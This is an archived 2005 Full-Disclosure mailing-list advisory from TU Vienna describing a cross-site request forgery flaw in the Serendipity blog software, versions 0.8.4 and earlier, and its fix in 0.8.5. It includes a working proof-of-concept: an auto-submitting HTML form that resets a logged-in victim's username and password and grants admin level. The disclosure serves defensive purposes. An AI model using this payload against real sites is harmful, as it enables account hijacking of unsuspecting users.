Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Serendipity: Account Hijacking / CSRF Vulnerability

from [Nenad Jovanovic] Network Security [Permanent Link]
Subject: [Full-disclosure] Serendipity: Account Hijacking / CSRF Vulnerability
Date: Thu, 29 Sep 2005 16:04:48 +0200 
===========================================================
Serendipity: Account Hijacking / CSRF Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005
===========================================================


Affected applications
----------------------

Serendipity (www.s9y.org)

Versions 0.8.4 and prior.


Description
------------

An attacker is able to change the username and password of a logged-in
user (and can therefore hijack his account) by tricking the user into
clicking a link to a page with the following contents:

<form action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&amp;serendipity[adminAction]=save"; method="post">
<input type="text" name="username" value="evilguy" />
<input type="text" name="password" value="evilpass" />
<input type="text" name="realname" value="John Doe" />
<input type="text" name="userlevel" value="255"/>
<input type="text" name="email" value="john@example.com" />
<input type="text" name="lang" value="en"/>
<input type="submit" name="SAVE" value="Save" />
</form>

    <script type="text/javascript">
      document.forms[0].submit();
    </script>

The fields "your-server" and "path-to-s9y" in the form's action
attribute have to be adjusted accordingly.

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.


Solution
---------

Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem
itself.


Acknowledgements
-----------------

Thanks to Serendipity developer Garvin Hicking for his quick response
and professional cooperation.


Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Serendipity: Account Hijacking / CSRF Vulnerability, Nenad Jovanovic <=
Previous by Date:  Re: [Full-disclosure] Suggestion for IDS, Michael Holstein
Next by Date:  Re: [Full-disclosure] Re: Is the Bottom Line Impacted by Security Breaches?, bkfsec
Previous by Thread:  [Full-disclosure] [SECURITY] [DSA 824-1] New ClamAV packages fix denial of service, Martin Schulze
Next by Thread:  [VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS, saintlinu
Indexes:  [Date] [Thread] [Top] [All Lists]